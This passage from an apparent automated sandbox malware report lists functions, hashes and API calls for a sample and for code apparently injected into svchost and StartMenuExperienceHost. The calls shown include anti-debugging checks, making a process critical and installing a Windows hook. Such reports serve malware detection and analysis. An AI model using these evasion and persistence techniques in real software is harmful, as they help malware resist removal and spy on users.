                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1155477157-0
                                                                                                                  • Opcode ID: b01abdc0be38145406134691f2eb5e934e2a758a2617852cd0f54cb6c346f7e1
                                                                                                                  • Instruction ID: 5b176a8d4ab001316a783bde525e8ace8417a90a4d059245607769e879b9dcab
                                                                                                                  • Opcode Fuzzy Hash: b01abdc0be38145406134691f2eb5e934e2a758a2617852cd0f54cb6c346f7e1
                                                                                                                  • Instruction Fuzzy Hash: 83312823A387828BEF55BF219445369B650AB08BF4F980B30DA7D077D2DE3CE4928710
                                                                                                                  Function 00007FF77C91EC40 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC80
                                                                                                                  • SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC8C
                                                                                                                  • GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECB2
                                                                                                                  • SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECBF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributeConsoleHandleText
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1363055914-0
                                                                                                                  • Opcode ID: 9f73a390d6564c8f6131c3e7c7e1b18f1b0f09ff10a1723eb723d5c2baf84b6e
                                                                                                                  • Instruction ID: 844d4360c8ed77003e1e540c0b68c7939442aa6bdd3b38e64daa4e54cadc31ea
                                                                                                                  • Opcode Fuzzy Hash: 9f73a390d6564c8f6131c3e7c7e1b18f1b0f09ff10a1723eb723d5c2baf84b6e
                                                                                                                  • Instruction Fuzzy Hash: B9115E63628A4186D750AF22E800169B765FB88FE0F840535EF9D07798DF7CD8948B20

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:22.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:33.3%
                                                                                                                  Total number of Nodes:9
                                                                                                                  Total number of Limit Nodes:0

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFAAC3B7BE1 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1145 7ffaac3b7be1-7ffaac3b7c9d CheckRemoteDebuggerPresent 1149 7ffaac3b7ca5-7ffaac3b7ce8 1145->1149 1150 7ffaac3b7c9f 1145->1150 1150->1149
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725665270.00007FFAAC3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_7ffaac3b0000_StartMenuExperienceHost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3662101638-0
                                                                                                                  • Opcode ID: de6c549c764ede25cda00e83e93a0bad26715b236324cfafb57c7940ddf1ec3c
                                                                                                                  • Instruction ID: 97decfd89b39973a257e9374ed568b172411a3fcee2aeb1acfe6a46ae57dc1aa
                                                                                                                  • Opcode Fuzzy Hash: de6c549c764ede25cda00e83e93a0bad26715b236324cfafb57c7940ddf1ec3c
                                                                                                                  • Instruction Fuzzy Hash: 7731433180875C8FCB58DF68C84AAE97BE0FF65321F04426FD489D7292DB34A806CB91
                                                                                                                  Function 00007FFAAC3B97AD Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1124 7ffaac3b97ad-7ffaac3b9890 RtlSetProcessIsCritical 1128 7ffaac3b9892 1124->1128 1129 7ffaac3b9898-7ffaac3b98cd 1124->1129 1128->1129
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725665270.00007FFAAC3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_7ffaac3b0000_StartMenuExperienceHost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2695349919-0
                                                                                                                  • Opcode ID: d70ab64b5e232d4eb32418e4141e9ac6e9cbbe235039e5aaa5eccd7233919cb6
                                                                                                                  • Instruction ID: 5739edb6ccb407e863018dfb24f030edd3d40301d6cc7e86115b64c1a7262da9
                                                                                                                  • Opcode Fuzzy Hash: d70ab64b5e232d4eb32418e4141e9ac6e9cbbe235039e5aaa5eccd7233919cb6
                                                                                                                  • Instruction Fuzzy Hash: E941F47180C7598FD718DFA8D845AE9BBF0FF56311F04416EE08AC3692DB74A846CB91
                                                                                                                  Function 00007FFAAC3B9FB8 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1131 7ffaac3b9fb8-7ffaac3b9fbf 1132 7ffaac3b9fca-7ffaac3ba03d 1131->1132 1133 7ffaac3b9fc1-7ffaac3b9fc9 1131->1133 1137 7ffaac3ba043-7ffaac3ba048 1132->1137 1138 7ffaac3ba0c9-7ffaac3ba0cd 1132->1138 1133->1132 1140 7ffaac3ba04f-7ffaac3ba050 1137->1140 1139 7ffaac3ba052-7ffaac3ba08f SetWindowsHookExW 1138->1139 1141 7ffaac3ba097-7ffaac3ba0c8 1139->1141 1142 7ffaac3ba091 1139->1142 1140->1139 1142->1141
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725665270.00007FFAAC3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_7ffaac3b0000_StartMenuExperienceHost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HookWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2559412058-0
                                                                                                                  • Opcode ID: cfdd6421b40808f015cd1294fb6ae66c0a2907e131b7ed5d74d8045591d8bcb3
                                                                                                                  • Instruction ID: 1f05817b530f11ce46bb39aebfd9fe3dc4acdb360706598adf33272887213e37
                                                                                                                  • Opcode Fuzzy Hash: cfdd6421b40808f015cd1294fb6ae66c0a2907e131b7ed5d74d8045591d8bcb3
                                                                                                                  • Instruction Fuzzy Hash: 8941167191CE4D8FEB18DB6CD846AF9BBE1EB59321F00427ED00DC3292DE64A81687C1

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFAAC3E1779 Relevance: 7.2, Strings: 5, Instructions: 904COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  • Opcode ID: f46bad4d679176113604c135b8dc937e8f7b2c1d4a042cd1eea58e6619bc7a39
                                                                                                                  • Instruction ID: b77bdc2b867f81399d414925a1dbf51db51ae05924ad1104f99e0c0254ed2fc3
                                                                                                                  • Opcode Fuzzy Hash: f46bad4d679176113604c135b8dc937e8f7b2c1d4a042cd1eea58e6619bc7a39
                                                                                                                  • Instruction Fuzzy Hash: 2552C561B28E098BF798E7788455AB9B7D2EF99300F4445B9E04EC32D6DF28AC058791
                                                                                                                  Function 00007FFAAC3E2259 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 5a5fef9169129e59206560c7b0762481430b5fd9137a23880c017aba4f692452
                                                                                                                  • Instruction ID: 40940c51b45e6630542b823f7f1651e1b9032d90f1d1d0cd39180cb370d8fe9e
                                                                                                                  • Opcode Fuzzy Hash: 5a5fef9169129e59206560c7b0762481430b5fd9137a23880c017aba4f692452
                                                                                                                  • Instruction Fuzzy Hash: 64517551A1EAC54FE786A7788825A75BFE4DF47215B0844FBE0CDC71E3DE08880AC392
                                                                                                                  Function 00007FFAAC3E09FA Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :L_^$k:L
                                                                                                                  • API String ID: 0-2007851088
                                                                                                                  • Opcode ID: 9230fcfbbb6180ac08c0492853ab96c0a328a86d55fd3ee726a4b70906cda895
                                                                                                                  • Instruction ID: 15b5c52e7b881afba9748089209746d372af56e37c5e9830df042887b49080be
                                                                                                                  • Opcode Fuzzy Hash: 9230fcfbbb6180ac08c0492853ab96c0a328a86d55fd3ee726a4b70906cda895
                                                                                                                  • Instruction Fuzzy Hash: EF01D41670A69249E7027ABDB4518FCBB90DE86375B4842B3C3C9C9173861450CB83C6
                                                                                                                  Function 00007FFAAC3E0650 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 35d7ae89d17cd723aa67ac0b0130566082898513cee21087712efc2e540ae809
                                                                                                                  • Instruction ID: 525d20f44c088f2547d89ff03145ba1e6de431edc245356623e7ff1de924427e
                                                                                                                  • Opcode Fuzzy Hash: 35d7ae89d17cd723aa67ac0b0130566082898513cee21087712efc2e540ae809
                                                                                                                  • Instruction Fuzzy Hash: FB310961B1C9484FE798EB7CD45AB79BBC6EB99311F0445BEE04EC32A3DE549C028781
                                                                                                                  Function 00007FFAAC3E0D81 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 5fbd5149c68bfba6f0bf3e0281f5be170467448b590b3cbba1a35084051eceb6
                                                                                                                  • Instruction ID: 00399d5fb6d490d78910dd16fb98b259e1ebddad5fd8b03cd36bfb1799ac48e9
                                                                                                                  • Opcode Fuzzy Hash: 5fbd5149c68bfba6f0bf3e0281f5be170467448b590b3cbba1a35084051eceb6
                                                                                                                  • Instruction Fuzzy Hash: A521C752B18F454FF784B7B8981ABB97BD5EF95741F0842BAE00DC3292DE189C4143D2
                                                                                                                  Function 00007FFAAC3E130D Relevance: .5, Instructions: 508COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1ebe7ce231fded5728fe7626a2d7c10864fff1452fa9d612927d7cfda1f7b500
                                                                                                                  • Instruction ID: b7899b69cd63f28912557a9ae17163f1a942bd5e3be6026c2a8fcb2f00f8f72a
                                                                                                                  • Opcode Fuzzy Hash: 1ebe7ce231fded5728fe7626a2d7c10864fff1452fa9d612927d7cfda1f7b500
                                                                                                                  • Instruction Fuzzy Hash: 04412462E19B4A8FE741E7BCD8618FDBBF1EF46220B4481B7C14ED75A3DE2854068391
                                                                                                                  Function 00007FFAAC3E0705 Relevance: .3, Instructions: 252COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dee40a6e65711ba6d520055a9a4c18d45e13f2e85e436fbbe2fb01438f558514
                                                                                                                  • Instruction ID: 53ea2f404959d3f3931525fb95eb36b81d50bce87697e717f69c4dd0b7c93c05
                                                                                                                  • Opcode Fuzzy Hash: dee40a6e65711ba6d520055a9a4c18d45e13f2e85e436fbbe2fb01438f558514
                                                                                                                  • Instruction Fuzzy Hash: F8913171A0E78A4FF345EB7884618E9BFA1EF4221475481BAD08DC76A7DB289805C7D1
                                                                                                                  Function 00007FFAAC3E0EEE Relevance: .2, Instructions: 202COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 68e04723162fa16737673a339cd1b24db821d6bd05d8e3ec0cdd72fe91a9e994
                                                                                                                  • Instruction ID: 4a94bef3b61f11ede5381f86c2b9182d33aa4de65ebe2f3d85191df0852cb82f
                                                                                                                  • Opcode Fuzzy Hash: 68e04723162fa16737673a339cd1b24db821d6bd05d8e3ec0cdd72fe91a9e994
                                                                                                                  • Instruction Fuzzy Hash: 2F510862A0EA860FE356A73C94569B97BD5DF87220B0940FBD08DC71A3DD1C584783A1
                                                                                                                  Function 00007FFAAC3E0A68 Relevance: .2, Instructions: 181COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 43519fb806051b7b49a2677cbbb1f609c16667b2f30c89df9c2ec26cabed6b66
                                                                                                                  • Instruction ID: 35c964d2373587c942ade90d4846252ac86d261a37ddbd6477cc472672b51bfe
                                                                                                                  • Opcode Fuzzy Hash: 43519fb806051b7b49a2677cbbb1f609c16667b2f30c89df9c2ec26cabed6b66
                                                                                                                  • Instruction Fuzzy Hash: EE414A1770A9675AEA017B7CF8429E97F54DF8237574C82B7C249CB1B3CA25A08B83D1
                                                                                                                  Function 00007FFAAC3E0BF3 Relevance: .2, Instructions: 156COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9c2f144c4a625dcf4fb6a4908faef77f1261e02d17bd94cbaa96549526b0fdb0
                                                                                                                  • Instruction ID: f180d751b1a99ed69e3c24f1130cda3220c06b9da377e32b7a31ae4d80c95906
                                                                                                                  • Opcode Fuzzy Hash: 9c2f144c4a625dcf4fb6a4908faef77f1261e02d17bd94cbaa96549526b0fdb0
                                                                                                                  • Instruction Fuzzy Hash: A9412871A18A4A8FEB45FBBCC451AEDBBE1FF89301F548575D009D7293CE28A449C790
                                                                                                                  Function 00007FFAAC3E0870 Relevance: .1, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 26b9e4863e1b88c2701ccbe301344614562e206b0f05e224f6da6f97481eb5b4
                                                                                                                  • Instruction ID: 6984aa7373607ee1a2436da1e19fad244a06e03307b345d708cd23ff2c5fae40
                                                                                                                  • Opcode Fuzzy Hash: 26b9e4863e1b88c2701ccbe301344614562e206b0f05e224f6da6f97481eb5b4
                                                                                                                  • Instruction Fuzzy Hash: C931B96061874E8FE389F778C0A1CA9BBB2AF8920479085A5D44FD37ABDF2C59018761
                                                                                                                  Function 00007FFAAC3E2421 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 363be65e260e8a08b66272d639daa9573d405fe486750914f295ee65547920a5
                                                                                                                  • Instruction ID: e1f6027e498da151c5bc1ce28f7b5bca51aab12a1e7d7c648ffe48df0d351cbc
                                                                                                                  • Opcode Fuzzy Hash: 363be65e260e8a08b66272d639daa9573d405fe486750914f295ee65547920a5
                                                                                                                  • Instruction Fuzzy Hash: 63017B9480DB818FF345A3385851C31BFE0CF97210B0841BAE8CDC60A7DA08A94887D2
                                                                                                                  Function 00007FFAAC3E0E67 Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a431df8fcd2aed9a4eee9937ef202b9ca19e7439564d1208c32a972d7a9bd1db
                                                                                                                  • Instruction ID: fbc3eadb7e2b5f4c04fcbbee2bb14f0a40892a2e308d7e00b6926a4e2e202378
                                                                                                                  • Opcode Fuzzy Hash: a431df8fcd2aed9a4eee9937ef202b9ca19e7439564d1208c32a972d7a9bd1db
                                                                                                                  • Instruction Fuzzy Hash: 26E0ED61B1491D8FEF80EBACD845BFCB2D2EB9C252F1441B7D50ED3292DE2898418391

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFAAC3D1779 Relevance: 7.2, Strings: 5, Instructions: 904COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  • Opcode ID: 41a13e6781ac2bbb1b40a590c5e0b6f489f598a4a879ef06bd45f2cc505ee9a5
                                                                                                                  • Instruction ID: 32dfee87c756b2a61eceb6b0bfaf8798236b36941af1eca2dfddb3a974da1a41
                                                                                                                  • Opcode Fuzzy Hash: 41a13e6781ac2bbb1b40a590c5e0b6f489f598a4a879ef06bd45f2cc505ee9a5
                                                                                                                  • Instruction Fuzzy Hash: BB52F961B1CA498FF799F7788455BB9B7D2EF89301F4449B9E04EC3296DE28EC018391
                                                                                                                  Function 00007FFAAC3D2259 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: ce597226e40da6cb5c8b933c7d857380e3b091763f8578749f673b0a202b7d24
                                                                                                                  • Instruction ID: fb8aaf7b369078e84e40a22bf0f2a996ab315beecbf14e229aa5f28ecba562f0
                                                                                                                  • Opcode Fuzzy Hash: ce597226e40da6cb5c8b933c7d857380e3b091763f8578749f673b0a202b7d24
                                                                                                                  • Instruction Fuzzy Hash: 34512051A0EAC94FE786A7788865A75BFE4DF57215B0845FBE0CDC61A3DD088C0AC392
                                                                                                                  Function 00007FFAAC3D09FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :M_^$k:M
                                                                                                                  • API String ID: 0-4016585720
                                                                                                                  • Opcode ID: cc92b7fc9041137581d5a14930d920c7cde205439e0d3dec68134d07bfc4b1cb
                                                                                                                  • Instruction ID: 2e5200f77bc8caa6f8b73d4f619e0459dec43f71fa5babc607cc66ae9971b45d
                                                                                                                  • Opcode Fuzzy Hash: cc92b7fc9041137581d5a14930d920c7cde205439e0d3dec68134d07bfc4b1cb
                                                                                                                  • Instruction Fuzzy Hash: 3001A75B70A6A949E7027BBDF4518ECBB90DE86335B0843F3D3C9CD1638A14508687C5
                                                                                                                  Function 00007FFAAC3D0650 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 4b6b15df12c446f1568e110ad0eebe5de57e673cd121ff85d21a0887d550c6db
                                                                                                                  • Instruction ID: 5db4205dfdf79335c201210e13948d146e2bda4d2312160d3b70d104b101b2d5
                                                                                                                  • Opcode Fuzzy Hash: 4b6b15df12c446f1568e110ad0eebe5de57e673cd121ff85d21a0887d550c6db
                                                                                                                  • Instruction Fuzzy Hash: AA31C661B1C9484FE798EB7CD45AB79B7C6EB99311F0446BAE04EC32A3DD249C428381
                                                                                                                  Function 00007FFAAC3D0D81 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 10a55e59c8a983b5b4d318be90ebd88abc0f349da35c143cd0d10a2f005e07da
                                                                                                                  • Instruction ID: ef30e67f7865a70c3165296498879bc673903bb1f45fb4c0ddfd6c3bb21618b9
                                                                                                                  • Opcode Fuzzy Hash: 10a55e59c8a983b5b4d318be90ebd88abc0f349da35c143cd0d10a2f005e07da
                                                                                                                  • Instruction Fuzzy Hash: 6D21D352A19F4A4BF785A7B8981ABB9ABD5EF95701F0883BAE00DC3292DD189C014391
                                                                                                                  Function 00007FFAAC3D130D Relevance: .5, Instructions: 512COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8720dbfb1c7d3e10ce4b7158e087b1834c65b38ad4e6591829407871af4a46d9
                                                                                                                  • Instruction ID: 77a0027799031c60a8618995cdf9defc9b9eedcb9429200ea6f7a149328240bb
                                                                                                                  • Opcode Fuzzy Hash: 8720dbfb1c7d3e10ce4b7158e087b1834c65b38ad4e6591829407871af4a46d9
